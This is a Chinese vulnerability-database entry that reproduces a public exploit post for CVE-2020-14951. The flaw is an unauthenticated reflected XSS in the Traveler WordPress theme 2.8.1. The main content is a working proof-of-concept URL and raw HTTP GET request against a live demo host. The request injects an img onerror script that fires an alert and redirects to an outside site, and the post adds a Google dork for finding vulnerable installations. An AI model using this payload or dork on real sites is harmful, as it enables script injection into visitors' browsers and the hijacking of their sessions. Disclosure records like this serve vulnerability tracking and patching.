漏洞ID | 11632 | 漏洞类型 | |
发布时间 | 2020-06-22 | 更新时间 | 2020-06-28 |
CVE编号 | CVE-2020-14951 | CNNVD-ID | N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
漏洞来源
cxsecurity.com
官方跳转
漏洞详情
漏洞细节尚未披露
漏洞EXP
[+] Exploit Title: Travel Booking WordPress Theme v2.8.1 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/traveler/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ShineTheme [ http://shinetheme.com ]
[+] Software Version: 2.8.1
[+] Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14951
[+] CWE: CWE-79
### [ PoC: ]
[!] https://mixmap.travelerwp.com/search-hotel-full-map/?location_name=x&location_id=x&start=&end=&date=16/06/2020%2012:00%20am-17/06/2020%2011:59%20pm&room_num_search=x&adult_number=%22%3E%3Cimg%20src=%27x%27%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E&child_number=0&price_range=x&taxonomy[hotel_facilities]=
[!] GET /search-hotel-full-map/?location_name=x&location_id=x&start=&end=&date=16/06/2020%2012:00%20am-17/06/2020%2011:59%20pm&room_num_search=x&adult_number=%22%3E%3Cimg%20src=%27x%27%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E&child_number=0&price_range=x&taxonomy[hotel_facilities]= HTTP/1.1
Host: mixmap.travelerwp.com
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector